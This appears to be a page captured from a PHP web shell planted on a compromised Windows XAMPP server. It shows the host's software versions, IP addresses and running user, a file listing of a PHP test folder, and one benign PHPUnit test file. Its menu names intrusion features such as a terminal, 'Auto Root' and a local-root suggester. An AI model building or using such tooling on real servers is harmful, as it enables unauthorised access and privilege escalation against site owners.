Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.52
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
php /
tests /
Structures_Graph /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
AcyclicTestTest.php
1.28
KB
-rw-rw-rw-
2016-01-22 10:45
AllTests.php
444
B
-rw-rw-rw-
2016-01-22 10:45
BasicGraphTest.php
8.85
KB
-rw-rw-rw-
2016-01-22 10:45
TopologicalSorterTest.php
1.83
KB
-rw-rw-rw-
2016-01-22 10:45
helper.inc
349
B
-rw-rw-rw-
2016-01-22 12:50
Save
Rename
<?php require_once dirname(__FILE__) . '/helper.inc'; class Structures_Graph_AllTests { public static function main() { PHPUnit_TextUI_TestRunner::run(self::suite()); } public static function suite() { $suite = new PHPUnit_Framework_TestSuite('Structures_Graph Tests'); $dir = new GlobIterator(dirname(__FILE__) . '/*Test.php'); $suite->addTestFiles($dir); return $suite; } }